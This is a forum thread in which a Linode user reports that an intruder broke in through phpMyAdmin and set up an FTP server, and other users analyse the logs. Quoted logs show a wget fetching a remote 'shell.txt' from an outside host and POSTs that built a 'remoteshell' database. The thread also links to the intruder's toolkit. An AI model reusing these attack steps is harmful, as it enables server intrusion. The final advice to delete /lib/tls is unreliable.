Someone setup a ftp site on my linode.
It looks like someone decided to exploit something on my system and setup a ftp site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian setup. I am running the testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.
Thanks!
15 Replies
@tavella81:
Hello,
It looks like someone decided to exploit something on my system and setup a ftp site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian setup. I am running the testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.
Thanks!
What web applications you have on your website? One of them may have a vulnerability some attacker used to gain access to your Linode.
@tavella81:
I'm thinking it was phpmyadmin that allowed it. There was a file named old.php with mysql/mysql as the owner. I've removed it now. It looks like the person was using quite a few tools to mess with my system. I'm an idiot. Oh well…. live and learn. I guess the best part is I have the IP's of the person who created/accessed and all of the people who were downloading the software off of my system. I think I'm going to contact their ISP's.
Review your webserver logs, see what they did. I'd love to know what they exploited. I'm willing to spend a few minutes and review your webserver logs if you want.
http://www.avella.name/hack.tar
The tar is almost 26 megs. It includes their little toolkit. I found it because I did a ps -ax like I normally do and saw ./ftpd running… First clue that wasnt me…. Thanks!
Oh! the old.php was in my /var/www directory with the owner of mysql:mysql
```
[Fri Dec 30 19:22:42 2005] [error] [client 84.159.66.132] File does not exist: /var/www/avella/phpmyadmin/css/themes, referer: http://www.avella.name/phpmyadmin
/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right&js_isDOM=1
--19:22:59-- http://mitglied.lycos.de/oldmeal1/shell.txt
=>
shell.txt'
Resolving mitglied.lycos.de… 212.78.204.20
Connecting to mitglied.lycos.de|212.78.204.20|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5,211 (5.1K) [text/plain]
0K ..... 100% 34.71 KB/s
19:23:00 (34.71 KB/s) - `shell.txt' saved [5211/5211]
````
That's from your error log, can you tar up (and gzip please) your access log for 12/30/2005?
They may have exploited some portion of MySQL through phpMyAdmin, using a database called remoteshell:
84.159.66.132 - - [30/Dec/2005:19:21:57 -0500] "GET /phpmyadmin/sql.php?lang=de-utf-8&server=1&collationconnection=utf8generalci&db=remoteshell&goto=dbdetailsstructure.php&sqlquery=DROP+DATABASE+
%60remoteshell%60&zerorows=Datenbank+%60remoteshell%60+wurde+gel%C3%B6scht.&goto=main.php&back=dbdetailsstructure.php&reload=1&purge=1&isjs_confirmed=1 HTTP/1.1" 200 6635 "
pmyadmin/dbdetailsstructure.php?lang=de-utf-8&server=1&collationconnection=utf8general_ci&db=remoteshell" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"
Then they restored a database dump via POST:
84.159.66.132 - - [30/Dec/2005:19:22:20 -0500] "POST /phpmyadmin/readdump.php HTTP/1.1" 200 4760 "
ralci&db=mysql&goto=dbdetailsstructure.php&dbquery_force=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"
And they did another database dump via POST, which somehow resulted in /old.php getting created.
Because access logs don't log POST data, I can't tell exactly what happened, but I can make an educated guess. The above wget command in the error logs were probally caused by phpmyadmin.css.php, mis-parsing the contents of a database in MySQL. It looks like it may have made PHP execute some PHP code that resided in the remoteshell database.
Can you dump that database to a text file if you've still got it?
[will edit later with more info dug up]
Starting MySQL database server: mysqld…failed.
Please take a look at the syslog.
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'
Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!
I rebooted my system to make sure that no other programs were running that I wasn't aware of…
If you have an idea as how to restore the mysql server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow-up tomorrow.
mysqldump -u root -p remoteshell > remoteshell.txt
(the enter your root mysql password at the prompt)
Fortunately it restarted with a reboot.
I found a directory under /var/tmp/ that had no name but appeared to contain some sort of pseudo server.
It may be worth checking for this folder.
avella:~# mysqld
060103 19:13:11 InnoDB: Database was not shut down normally!
InnoDB: Starting crash recovery.
InnoDB: Reading tablespace information from the .ibd files…
InnoDB: Restoring possible half-written data pages from the doublewrite
InnoDB: buffer…
060103 19:13:12 InnoDB: Starting log scan based on checkpoint at
InnoDB: log sequence number 0 47300.
InnoDB: Doing recovery: scanned up to log sequence number 0 47346
InnoDB: Last MySQL binlog file position 0 79, file name /var/log/mysql/mysql-bin.000121
060103 19:13:12 InnoDB: Flushing modified pages from the buffer pool…
060103 19:13:12 InnoDB: Started; log sequence number 0 47346
060103 19:13:12 [ERROR] Fatal error: Can't open and lock privilege tables: Table 'mysql.host' doesn't exist
I'm lost… I don't want to potentially loose what they posted. How can I go about restoring my data?
@tavella81:
I've never done it before but I'll give it a try…. hold.
Starting MySQL database server: mysqld…failed.
Please take a look at the syslog.
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'
Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!
I rebooted my system to make sure that no other programs were running that I wasn't aware of…
If you have an idea as how to restore the mysql server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow-up tomorrow.
Did you do "apt-get upgrade" recently? If so, check if /lib/tls exists. That is evil. You got to watch for it when you do upgrade and remove it every time it shows up again.